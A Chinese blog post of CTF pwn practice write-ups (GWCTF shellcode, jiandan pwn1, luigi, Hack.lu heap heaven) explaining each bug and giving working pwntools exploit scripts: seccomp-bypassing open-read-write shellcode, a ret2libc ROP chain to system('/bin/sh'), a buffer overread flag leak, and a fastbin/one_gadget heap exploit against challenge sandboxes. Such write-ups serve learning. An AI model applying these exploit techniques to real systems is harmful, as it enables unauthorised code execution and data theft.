[ctfbub.pwn] 练习 16-

最新推荐文章于 2023-12-13 22:37:22 发布
最新推荐文章于 2023-12-13 22:37:22 发布
阅读量497 收藏
点赞数
分类专栏: CTF pwn 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/126738919
版权

GWCTF-2019-Pwn-shellcode

不知道为啥F5不行,就直接看汇编。

这里边先call set_secommp显然是不让execve要用orw,然后是read(0,s,0x64)读入shellcode,然后检查是否可打印字符。

坑:read后eax的值为读入的长度,在这作了个sub eax,1 就是减1然后置0就删掉了最后一个字符。所以要加个尾。

 打印字符检查里遇0就返回了,所以可以用个0跳过。

from pwn import *

#p = remote('challenge-c6636f18857ee1b9.sandbox.ctfhub.com', 20766)
p = process('./pwn')

context(arch='amd64', log_level='debug')

'''
1,禁用了execve 不能直接用shellcraft.sh()
2,检查是否可打印字符,由于ORW长度不够不能全用可打印shellcode 用push 0截断
3,read后会删掉最后一个字符,在尾部需随意添加一个字符填充
'''
payload = "push 0"
payload+= shellcraft.open("/flag",0) #读文件
payload+= shellcraft.read("rax","rsp",0x300)
payload+= shellcraft.write(1,"rsp",0x300)

p.sendafter(b"Welcome,tell me your name:", asm(payload)+b'aaa')

p.interactive()

网站的后端可能有问题,一直没反应。100点又没了。

GWCTF-2019-Pwn-jiandan pwn1

就是个简单的栈溢出,只不过中间经过v4,只要在v4的问题放上v4当时的值+1或者跳到下一个位置也可以。

from pwn import *

p = process("./pwn")
#p = remote('challenge-0fe3edd8dc7a8929.sandbox.ctfhub.com', 37463)

context(arch='amd64', log_level='debug')
elf = ELF('./pwn')
pop_rdi = 0x0000000000400743 # pop rdi ; ret

p.recvline()
p.sendline(b'A'*(0x10c) + p8(0x18) + flat(pop_rdi, elf.got['puts'], elf.plt['puts'], 0x400540)) #

libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x80ed0
system = libc_base + 0x50d60
bin_sh = libc_base + 0x1d8698
print('libc:', hex(libc_base))

p.sendline(b'A'*(0x10c) + p8(0x18) + flat(pop_rdi+1, pop_rdi, bin_sh, system, 0x40069e))

p.interactive()

这个题ctfhub后台有问题,不显示输出。这个好像没啥办法。

2017-Hackerolympiad-Pwn-luigi

0解是有原因了,估计是后台没有flag.txt这个文件。

题目要输入用户名到s1 和v4然后读入flag.txt到s2如果不是admin会显示用户名,如果用户名输满64字符则会带出flag

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+0h] [rbp-D0h] BYREF
  char s1[64]; // [rsp+40h] [rbp-90h] BYREF
  char s2[72]; // [rsp+80h] [rbp-50h] BYREF
  unsigned __int64 v7; // [rsp+C8h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  setbuf(_bss_start, 0LL);
  puts("Enter username:");
  s1[(int)read_string(s1, 64LL)] = 0;   //在最后一位后加0,输64字符不被截断
  puts("Enter password:");
  v4[(int)read_string(v4, 64LL)] = 0;
  read_flag(s2, 64LL);
  if ( !strcmp(s1, "admin") )
  {
    if ( !strcmp(v4, s2) )
    {
      puts("Logged in!");
      printf("The flag is: %s\n", s2);
    }
  }
  else
  {
    printf("Invalid user %s\n", s1);
  }
  return 0;
}
from pwn import *

p = process("./pwn")
#p = remote("challenge-ddaeddf4bee90cf0.sandbox.ctfhub.com", 27185)

context.log_level = 'debug'

p.sendafter(b'Enter username:', b'A'*64)
p.sendafter(b"Enter password:\n", b'A\n')
p.recvline()

p.interactive()

Hack.lu-Pwn-heap heaven

看上去是个堆题,但是明显不同。这里只有随意写和free

漏洞有两点:

  1. puts(*v2); 这里如果输出v2处的值应该是puts(v2),加*后就是把v2作为指针输出
  2. free的时候,并没有限制长度,这样可以通过偏移从mmap得到址地址,从而释放堆块。
__int64 __fastcall leak_wrapper(__int64 a1)
{
  const char **v2; // [rsp+18h] [rbp-8h]

  v2 = (const char **)(mmapped + a1);
  if ( mmapped + a1 > (unsigned __int64)(MMAP_SIZE - 8LL + mmapped) || (unsigned __int64)v2 < mmapped )
    return 1LL;
  puts(*v2);
  return 0LL;
}
__int64 __fastcall free_wrapper(__int64 a1)
{
  free((void *)(mmapped + a1));
  return 0LL;
}

先造个大块标记,free后会生成指向main_arena+68的指针,在这个指针附近有libc地址,堆地址和mmap的地址(尾号是0,需要向前加1位偏移)。

#0x7f8931976b78:	0x000055e70566e040	0x0000000000000000
#0x7f8931976b88:	0x0000000911f15000	0x0000000911f15000
#0x7f8931976b98:	0x00007f8931976b88	0x00007f8931976b88

另外一个结构state->bye,menu,先在mmap里释放一个块,这样这个地址会放入fastbin,再去把state释放掉,fd会指向上一个被释放的块,这样state->刚释放到fastbin的块-0x10的位置,这时候提前把-8的位置改为one_gadget就可以当作menu来执行。

from pwn import *

'''  
patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
patchelf --add-needed /home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so pwn
'''

#p = process('./pwn')
p = remote('challenge-75ca350048660222.sandbox.ctfhub.com', 31222) 

libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

menu = b"[5] : exit\n"
def write(offset, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"How much do you want to write?\n", str(len(msg)).encode())
    p.sendlineafter(b"At which offset?\n", str(offset).encode())
    p.send(msg)

def show(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"At which offset do you want to leak?\n", str(idx).encode())

def free(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"At which offset do you want to free?\n", str(idx).encode())

write(8, p64(0x101))
write(0x108,p64(0x21))
write(0x128,p64(0x21))

'''
0x7f8931976b78:	0x000055e70566e040	0x0000000000000000
0x7f8931976b88:	0x0000000911f15000	0x0000000911f15000
0x7f8931976b98:	0x00007f8931976b88	0x00007f8931976b88
'''

free(0x10)
show(0x10)
heap_base = u64(p.recvline()[:-1].ljust(8, b'\0')) - 0x40
print('heap:', hex(heap_base))

write(0x10, p8(0x89))
show(0x10)
mmap_base = u64(b'\x00'+p.recvline()[:-1].ljust(7, b'\0'))
print('mmap:', hex(mmap_base))

write(0x10, p8(0x98))
show(0x10)
libc_base = u64(p.recvline()[:-1].ljust(8, b'\0')) - 0x78 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
one_gadget = libc_base + one[2]
print('libc:', hex(libc_base))

write(0, flat(0,0x21,0,0,0,0x21,0,0,0,0x21))
free(0x10)

write(8, p64(one_gadget))  #state->mmap+0,mmap+8=menu=one
free(heap_base+0x10 - mmap_base)

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ubuntu16.04离线安装openssh以及依赖包
02-05
离线安装openssh主要需要安装openssh-server_7.2p2- 4ubuntu2.8_amd64.deb、openssh-sftp-server_7.2p2- 4ubuntu2.8_amd64.deb和openssh-client_7.2p2-4ubuntu2.8_amd64.deb 三个文件。离线环境下通过依次运行命令dpkg -i ******.deb执行安装步 骤如下(尽可能按照次序安装,部分安装可能存在冗余): 1.先安装基本的依赖环境libc6_2.23-0ubuntu10_amd64.deb、libdbus-1 -dev_1.10.6-1ubuntu3.4_amd64.deb、libgcrypt20_1.6.5- 2ubuntu0.6_amd64.deb、libgpg-error0_1.21-2ubuntu1_amd64.deb、 libsystemd0_229-4ubuntu21.21_amd64.deb、ssh-import-id_5.5- 0ubuntu1_all.deb、zlib1g_1.2.8.dfsg-2ubuntu4.3_amd64l.deb; 2.安装openssh-sftp-server_7.2p2-4ubuntu2.8_amd64.deb、openssh- server_7.2p2-4ubuntu2.8_amd64.deb、openssh-client_7.2p2- 4ubuntu2.8_amd64.deb。 3.如果存在依赖关系缺失,可以根据提示到other文件夹下找,基本相关 的依赖都有了
[BUUCTF-pwn] pragyan_police_academy
weixin_52640415的博客
02-06 468
直接给flag的题。 先是%s读入有溢出然后用strncmp检查,然后是检查一下串长度是36 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+8h] [rbp-48h] BYREF int v5; // [rsp+Ch] [rbp-44h] char s1[16]; // [rsp+10h] [rbp-40h] BYREF char v7[40]; // [rsp+20
XCTF-xxxorrr
TA不懒,但还没有添加简介
04-04 696
XCTF-xxxorrr
NSSCTF 刷题记录
红叶的博客
03-07 884
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
逆向做题记录2023 4.3-4.9
m0_73718199的博客
04-09 864
在某些编程语言或者汇编语言中,使用 dup 语句可以重复生成一定数量的相同元素,可以用来快速生成一定数量的数组或者缓冲区。在计算机编程中,8 dup(0) 表示申请 8 个字节(或者 8 个元素)的连续内存空间,并将该空间的值初始化为 0。该函数的参数为指向 FILE 结构的指针,指示要关闭的文件。fopen() 是一个 C 标准库函数,用于打开一个文件并返回一个指向该文件的指针。函数将写入任何挂起的缓冲区数据,释放与文件流相关的所有缓冲区,并关闭该文件。是 C 标准库中的一个函数,用于关闭打开的文件。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctfpwn题char的libc库文件
2018.7.26学习笔记
weixin_42297538的博客
07-26 179
二进制逆向题目解析 1.
逆向入门--攻防世界进阶Re题解
crispr的博客
08-09 3970
前言 摸鱼选手表示最近鱼儿很多。。。好吧我摊牌了,最近忙着考驾照,真折磨人啊,赶紧补一补入门的逆向,不然白给了要。本次准备写两个Re的题解,都是来自攻防世界的进阶 正言 re1-100 自从上次入门后,现在做题的顺序基本摸清了,并且现在的题还没有出现啥花指令这些恶心内容,先把文件放到exeinfope中查看文件属性: 64位的ELF文件,直接拖到IDApro来看吧: // TAGS: ['file'] int __cdecl __noreturn main(int argc, const char **a
[WUSTCTF2020]level1 题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-10 5587
buuctf-[WUSTCTF2020]level1 题解
三个pwn
weixin_52640415的博客
06-28 1634
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
(BUUCTF)gwctf_2019_shellcode
最新发布
xy1458214551的博客
12-13 193
BUUCTF的gwctf_2019_shellcode题解
湖湘杯2021-pwn-final部分复现
qq_53062301的博客
12-09 4878
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘杯是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
[WUSTCTF2020]level3题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-24 391
[WUSTCTF2020]level3题解
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8876
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
[BUUCTF-pwn] stack2,stack3,stack4,stack3-rop
weixin_52640415的博客
02-18 579
这几个题像是哪哪哪讲从入门...课的例题。 题目的main函数是相同的,没有问题。 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[256]; // [rsp+10h] [rbp-100h] BYREF setbuf(stdin, 0LL); setbuf(stdout, 0LL); setbuf(stderr, 0LL); puts("welcome to stack2");
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值